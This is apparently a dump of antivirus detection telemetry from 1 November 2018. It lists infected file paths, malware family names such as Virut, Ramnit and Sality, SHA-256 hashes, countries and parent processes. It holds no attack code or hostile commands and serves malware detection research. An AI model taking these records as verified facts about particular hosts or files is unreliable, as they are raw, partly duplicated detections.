  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='abbf959ac30d23cf2882ec223966b0b8c30ae85415ccfc41a5924b29cd6bd4db', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T07:15:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='abbf959ac30d23cf2882ec223966b0b8c30ae85415ccfc41a5924b29cd6bd4db', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T07:15:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-080848-f1c2e20d', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-080816-EAE71227\\AVSCAN-20181101-080848-F1C2E20D', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='abbf959ac30d23cf2882ec223966b0b8c30ae85415ccfc41a5924b29cd6bd4db', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:09:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='ac6ce30ef5cbfbf941c2ba98eaf1f3bf0e4bdab311c255d7ed4d6d8e3b06e917', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T06:13:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='ace2cb691c408b678d2822c52779dcc258a16751518803e086ce31f1f13e2b13', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=21504, timestamp='2018-11-01T10:19:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='ace2cb691c408b678d2822c52779dcc258a16751518803e086ce31f1f13e2b13', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=455168, timestamp='2018-11-01T09:42:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='\\\\?\\C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='ace2cb691c408b678d2822c52779dcc258a16751518803e086ce31f1f13e2b13', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:09:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='\\\\?\\C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='ace2cb691c408b678d2822c52779dcc258a16751518803e086ce31f1f13e2b13', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:09:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='download_expert.exe', filepath='C:\\Download Expert\\Download_Expert.exe', filesize=4672000, name='HEUR/AGEN.1004471.#M1.#R1'), hash='adc00c66f046ca6468bb67c32aab78f57a41022497d62bde37fc34a8102deaa4', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T21:56:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$rcgonbk', filepath='C:\\$Recycle.Bin\\S-1-5-21-1024011789-1237596223-2747892489-21661\\$RCGONBK', filesize=64000, name='VBA/Dldr.Agent.qydjt.#M1.#R1'), hash='ae4ceb7a94761bad0147d3e5e790ecaeb29c6c5dcac76fba6c7afa1534b39fa2', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\totalcmd\\TOTALCMD64.EXE', parentsize=8694408, timestamp='2018-11-01T15:52:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-183145-454f9894', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5a6b3617\\AVSCAN-20181101-183054-3DAB933E\\AVSCAN-20181101-183145-454F9894', filesize=64000, name='VBA/Dldr.Agent.qydjt.#M1.#R1'), hash='ae4ceb7a94761bad0147d3e5e790ecaeb29c6c5dcac76fba6c7afa1534b39fa2', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:31:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mohaa.exe', filepath='\\?\\J:\\Medal of honor\\MOHAA.EXE', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='ae672c8c0083cd627f429b8212d116e07bff3be93a07379ccae9d14abc11b251', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:42:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='musik_archiv2011.exe', filepath='\\\\?\\L:\\Downlods-Firefox\\Musik_Archiv2011.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='ae6bfdedf82546836991517a266556d8c42f9a7a43fc0e6a3bb617be9f612bfd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T01:21:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aef866061c94bc3565c69964d30477942d9391ffb5392eae79d8e04067ba0772', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\AEF866061C94BC3565C69964D30477942D9391FFB5392EAE79D8E04067BA0772', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='aef866061c94bc3565c69964d30477942d9391ffb5392eae79d8e04067ba0772', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:28:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='unitprice_ปตร พร้อม สน คลองครุ[1].exe', filepath='\\\\?\\D:\\รังสิตใต้\\01-งานที่สำนัก ปี ก่อน-2554\\Cข้อมูลทั่วไป\\ข้อมูลรังสิตใต้-พี่ลา40\\SPEC49\\EX_ปตร\\UnitPrice_ปตร พร้อม สน คลองครุ\\ardv_suspicious_file(s)\\unitprice_ปตร พร้อม สน คลองครุ[1].exe', filesize=512000, name='TR/Patched.Ren.Gen.#M300.#R1795'), hash='af2218d85ff9165b2daa6dad3a35bca0f691d3ad2aa2e4c243b7f79719d0d3db', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:06:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='848be2e580d686e7b798be4557a8985e1dccaf61', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\848be2e580d686e7b798be4557a8985e1dccaf61', filesize=1408000, name='W32/Infector.Gen8.#M300.#R700734'), hash='af25ae9a1e8ddf6ef1ea56a350a03534969254016f31f4aeabc5859a9ace825d', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:58:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sould.exe', filepath='C:\\Program Files (x86)\\Keech\\sould.exe', filesize=384000, name='HEUR/AGEN.1029348.#M1.#R1'), hash='af91fa267af2b12ba4d25ad449557bc3adac52acc341d96a31f17d9eb5093186', metadata=Row(cmdline='pjay', country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Keech\\sould.exe', parentsize=384000, timestamp='2018-11-01T11:46:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='815ab391c277844d03754b2c7dfeb731fd37388e', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\815ab391c277844d03754b2c7dfeb731fd37388e', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='afcefa4e5ba531376e494a83497a547de83d982397c66b839cee82a18b841193', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T07:08:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fineprint pro v910 crack license key free download.exe', filepath='C:\\Users\\X\\Downloads\\Compressed\\FinePrint Pro v910 Crack License Key Free Download.exe', filesize=2368000, name='HEUR/AGEN.1006920.#M1.#R1'), hash='afd1f9dbfef929da58b4418c554b0344f7d785cae5c78aba78753eb7ce485dfb', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe13_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe13 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T20:14:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fineprint pro v910 crack license key free download.exe', filepath='C:\\Users\\X\\Downloads\\Compressed\\FinePrint Pro v910 Crack License Key Free Download.exe', filesize=2368000, name='HEUR/AGEN.1006920.#M1.#R1'), hash='afd1f9dbfef929da58b4418c554b0344f7d785cae5c78aba78753eb7ce485dfb', metadata=Row(cmdline='\\\\\\/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T20:14:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fineprint pro v910 crack license key free download.exe', filepath='C:\\Users\\X\\Downloads\\Compressed\\FinePrint Pro v910 Crack License Key Free Download.exe', filesize=2368000, name='HEUR/AGEN.1006920.#M1.#R1'), hash='afd1f9dbfef929da58b4418c554b0344f7d785cae5c78aba78753eb7ce485dfb', metadata=Row(cmdline='\\\\\\/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T20:14:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='installs.exe', filepath='C:\\Program Files\\SolidWorks Corp\\SolidWorks Flow Simulation\\License\\Flexlm\\installs.exe', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='b04d8e411d34db8073db8bc4e5fd6dcb27af7cef2c1c06a8369da191f9178ae3', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:LR+zorPAlEGtGn9J.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T01:41:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rthdvcpl.exe', filepath='C:\\Program Files\\Realtek\\Audio\\HDA\\RtHDVCpl.exe', filesize=15008000, name='W32/Sality.AT.#M1.#R1'), hash='b0816e4a9c8e23fd70960351480165780d57a68aadf4b5368008e2b52bc2cd34', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\msconfig.exe', parentsize=233984, timestamp='2018-11-01T17:08:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='b084cf08163b6768b9fb5fdc15569b7ee9a4720cfb3518e16787dcc28140d003', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\B084CF08163B6768B9FB5FDC15569B7EE9A4720CFB3518E16787DCC28140D003', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b084cf08163b6768b9fb5fdc15569b7ee9a4720cfb3518e16787dcc28140d003', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:28:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e_s50st7.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{7C63A674-7475-4F34-AAD8-AB6ADBE6A158}\\E_S50ST7.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='b0a3b047cfeb2de4454612b57d453577fb504670c64636565922381fa7c5fa0b', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T01:00:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e_farngei.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{8308B24D-24B1-4D07-868B-83DB87E48564}\\E_FARNGEI.EXE', filesize=256000, name='W32/Alman.BB.#M1.#R1'), hash='b0bc04b2ef41cf2611599cc94dbc02bb0ba52afe9e5418254d79ee5325a69976', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T01:00:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='8ce8165e201c2d7c65f86abdff93485ff42062c7', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\8ce8165e201c2d7c65f86abdff93485ff42062c7', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='b0be44e3f6f1e5838252466506f690235c61d4e7600899f09140e3e580521f3d', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:05:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='8ce8165e201c2d7c65f86abdff93485ff42062c7', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\2\\8ce8165e201c2d7c65f86abdff93485ff42062c7', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='b0be44e3f6f1e5838252466506f690235c61d4e7600899f09140e3e580521f3d', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Desktop\\hpScannerEngineAvira\\hpScannerEngineAvira.exe', parentsize=17408, timestamp='2018-11-01T20:05:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='8ce8165e201c2d7c65f86abdff93485ff42062c7', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\2\\8ce8165e201c2d7c65f86abdff93485ff42062c7', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='b0be44e3f6f1e5838252466506f690235c61d4e7600899f09140e3e580521f3d', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:05:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='8ce8165e201c2d7c65f86abdff93485ff42062c7', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\8ce8165e201c2d7c65f86abdff93485ff42062c7', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='b0be44e3f6f1e5838252466506f690235c61d4e7600899f09140e3e580521f3d', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:20:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='instmsiw.exe', filepath='D:\\Scan\\wulan1\\BACKUP\\BMD Street\\hysys 7.3\\aspenONEV7.3dvd1\\administration\\AFW\\instmsiw.exe', filesize=1856000, name='W32/Virut.Gen.#M1.#R1'), hash='b0dc31bd73c67f690775047ff0ba3bba16a49474383cec166fa822e0049e63a0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe783_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe783 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T14:45:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='instmsiw.exe', filepath='D:\\Scan\\wulan1\\BACKUP\\BMD Street\\hysys 7.3\\aspenONEV7.3dvd1\\administration\\AFW\\instmsiw.exe', filesize=1856000, name='W32/Virut.Gen.#M1.#R1'), hash='b0dc31bd73c67f690775047ff0ba3bba16a49474383cec166fa822e0049e63a0', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:24:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='instmsiw.exe', filepath='D:\\Scan\\wulan1\\BACKUP\\BMD Street\\hysys 7.3\\aspenONEV7.3dvd1\\administration\\AFW\\instmsiw.exe', filesize=1856000, name='W32/Virut.Gen.#M1.#R1'), hash='b0dc31bd73c67f690775047ff0ba3bba16a49474383cec166fa822e0049e63a0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe779_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe779 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T11:45:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='b1cac128b6acbc9b5c934f70b5c11455de30dd3a651e6891cbb8bc76f5bb5f9d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\B1CAC128B6ACBC9B5C934F70B5C11455DE30DD3A651E6891CBB8BC76F5BB5F9D', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b1cac128b6acbc9b5c934f70b5c11455de30dd3a651e6891cbb8bc76f5bb5f9d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:28:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='lzpk_0446297245.doc', filepath='G:\\GPArhiv\\LZPK_0446297245.doc', filesize=128000, name='W97M/Agent.06750161.#M1.#R1'), hash='b1cb5003bebe829f78836ffefd09450abcb1947b28f2fdd110c745cca89cb66b', metadata=Row(cmdline=None, country='BG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T18:38:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181026-164901-5b163ee8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8a51c869\\AVSCAN-20181026-163602-D3450E23\\AVSCAN-20181026-164901-5B163EE8', filesize=128000, name='W97M/Agent.06750161.#M1.#R1'), hash='b1cb5003bebe829f78836ffefd09450abcb1947b28f2fdd110c745cca89cb66b', metadata=Row(cmdline=None, country='BG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:52:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='newmhg37lwr.htm', filepath='C:\\Windows.old\\Users\\CP\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\MPXR3XHU\\newMHG37LWR.htm', filesize=248000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='b23ba101ba3b8e35eccb14f9f386611276d00f0e02a9a593baad05f4962ca9b5', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=818784, timestamp='2018-11-01T17:35:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='evernotenw.exe', filepath='C:\\Program Files (x86)\\Evernote\\Evernote\\NodeWebKit\\EvernoteNw.exe', filesize=42860000, name='W32/Parite.#M1.#R1'), hash='b23c9e88dcc9bbd593387bb828893dd0862454e39d73d7cdc22ecbd4c811f70f', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:cLArZI+tVEaa0b7n.1', country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T20:57:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$r5ir13f', filepath='C:\\$Recycle.Bin\\S-1-5-21-1024011789-1237596223-2747892489-21661\\$R5IR13F', filesize=64000, name='VBA/Dldr.Agent.dserd.#M1.#R1'), hash='b285603f06baa809f49c91a2fe8abe904fb9ce06954359d024a791c79f8f8f4d', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\totalcmd\\TOTALCMD64.EXE', parentsize=8694408, timestamp='2018-11-01T17:03:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-200150-74d1349a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5a6b3617\\AVSCAN-20181101-200125-710AC37B\\AVSCAN-20181101-200150-74D1349A', filesize=64000, name='VBA/Dldr.Agent.dserd.#M1.#R1'), hash='b285603f06baa809f49c91a2fe8abe904fb9ce06954359d024a791c79f8f8f4d', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:01:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155250-b8f5273f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32567766\\AVSCAN-20181101-153245-260801C5\\AVSCAN-20181101-155250-B8F5273F', filesize=124000, name='TR/Agent.ahovu.#M300.#R5130'), hash='b28a341093bb24af1aebafd73a975ac7eb06538547ce015b6027f700446b130a', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:22:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='emwinview.exe', filepath='E:\\softwere\\keil4.7\\ARM\\Segger\\emWin\\Tool\\emWinView.exe', filesize=124000, name='WORM/Autorun.14848.#M300.#R5130'), hash='b28a341093bb24af1aebafd73a975ac7eb06538547ce015b6027f700446b130a', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T11:00:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='superencontre.exe', filepath='C:\\Users\\X\\Documents\\jeux\\superencontre.exe', filesize=384000, name='HEUR/APC.#M1.#R1'), hash='b2e37e15e5a87138ec89400a74b48175f6c7731bda70e808ee26865713b56329', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:37:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-173010-cf02dcc2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-172214-3847C684\\AVSCAN-20181101-173010-CF02DCC2', filesize=384000, name='HEUR/APC.#M1.#R1'), hash='b2e37e15e5a87138ec89400a74b48175f6c7731bda70e808ee26865713b56329', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:30:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='b2f92f1091280d1c613b1192394013e5869a4815f01d79ae3e7bbc29b3b74640', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_20.10.2019-12.available\\Avira\\B2F92F1091280D1C613B1192394013E5869A4815F01D79AE3E7BBC29B3B74640', filesize=3328000, name='TR/Drop.Agent.rfutq.#M1.#R1'), hash='b2f92f1091280d1c613b1192394013e5869a4815f01d79ae3e7bbc29b3b74640', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:00:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e_s50st7.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{DC7A9AF2-4E10-4F1C-BF23-AD934E0E5040}\\E_S50ST7.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='b2fe9386f50e24bb260b35b6e0e706ab082c145ff288472ff1da90a3babcccad', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T01:01:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bilibili.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\lgE589A.tmp\\bilibili.dll', filesize=128000, name='ADWARE/Adware.Gen7.#M300.#R601658'), hash='b33ad7d6f22ca8a8556926cd6bb0e8d8fc9962e540ed2ca3200e75a5735c3c72', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:47:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bilibili.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\lgE589A.tmp\\bilibili.dll', filesize=128000, name='ADWARE/Adware.Gen7.#M300.#R601658'), hash='b33ad7d6f22ca8a8556926cd6bb0e8d8fc9962e540ed2ca3200e75a5735c3c72', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\EnigmaSoft\\SpyHunter\\ShKernel.exe', parentsize=9872688, timestamp='2018-11-01T21:47:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bilibili.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\lgE589A.tmp\\bilibili.dll', filesize=128000, name='ADWARE/Adware.Gen7.#M300.#R601658'), hash='b33ad7d6f22ca8a8556926cd6bb0e8d8fc9962e540ed2ca3200e75a5735c3c72', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:47:36Z'), dt=datetime.date(2018, 11, 1)),
